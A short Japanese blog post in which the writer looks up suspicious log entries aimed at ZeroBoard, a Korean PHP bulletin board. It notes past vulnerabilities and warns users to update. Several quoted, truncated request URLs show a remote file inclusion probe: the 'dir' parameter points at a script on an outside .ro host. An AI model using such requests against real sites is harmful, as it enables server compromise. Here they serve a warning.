//bbs/skin/zero_vote/login.php?dir=http:// ... net.ro/key.txt?...
//zboard/skin/zero_vote/login.php?dir=http ... net.ro/key.txt?...
気になるのでちょっとググってみた。//zboard/skin/zero_vote/login.php?dir=http ... net.ro/key.txt?...
ふむふむ。「ZeroBoard」なる韓国産のPHP掲示板らしい。
調べてみると、どうやら2005年くらいに脆弱性が発見されてるけど、
register_globalsをoffにすれば回避できたとか。
(きっとその後のver.upにて対策してるやろうけど。)
その後も、2006年にもXSSによる攻撃があった模様。
「dir」のパラメータでゴニョゴニョしてるあたりは、2005年の時の
攻撃に似てる気がするなんとなくやけど。
日本でも使われとるんかな。でも本家サイトがハングルで読まれへん。
サイト右上の「select language」がほぼ意味を成してない。
yahoo web翻訳にかけてみたけど、たとえば更新履歴のページは
「ポムムンでなが葱であるアップロドウィしたアクション追加 」
全く意味が理解できない。。。 ナイスyahoo翻訳
お、なんか2009年2月にもセキュリティホールが発見されとる。
被害verは1.1.5。最新verは現時点で1.2.3やから、とりあえず
ver upしたらいけるんかな?(未確認)
とにかくZeroBoard使ってる方はご注意。
0 件のコメント :
コメントを投稿